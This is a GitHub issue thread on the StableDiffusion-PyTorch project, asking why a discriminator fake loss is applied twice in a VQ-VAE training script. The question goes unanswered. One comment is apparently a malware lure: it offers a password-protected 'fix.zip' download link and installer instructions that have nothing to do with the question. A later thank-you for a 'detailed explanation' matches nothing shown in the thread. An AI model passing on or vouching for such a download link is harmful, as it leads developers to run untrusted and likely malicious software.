### ISSUE TITLE
Why is `disc_fake_loss` applied twice in train_vqvae.py?

### ISSUE THREAD

**Issue by whikwon** [explainingai-code/StableDiffusion-PyTorch#24]
Thank you for sharing this excellent project.
I'm curious about why `disc_fake_loss` is applied twice in the code, as shown in these two sections:

https://github.com/explainingai-code/StableDiffusion-PyTorch/blob/fc339861e005af4d9d523f84b9615de6e6dccfae/tools/train_vqvae.py#L135-L139

https://github.com/explainingai-code/StableDiffusion-PyTorch/blob/fc339861e005af4d9d523f84b9615de6e6dccfae/tools/train_vqvae.py#L151-L155

Could you explain the reasoning behind this approach?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by whikwon** [comment]
Ah, I got it. Thanks for the detailed explanation.
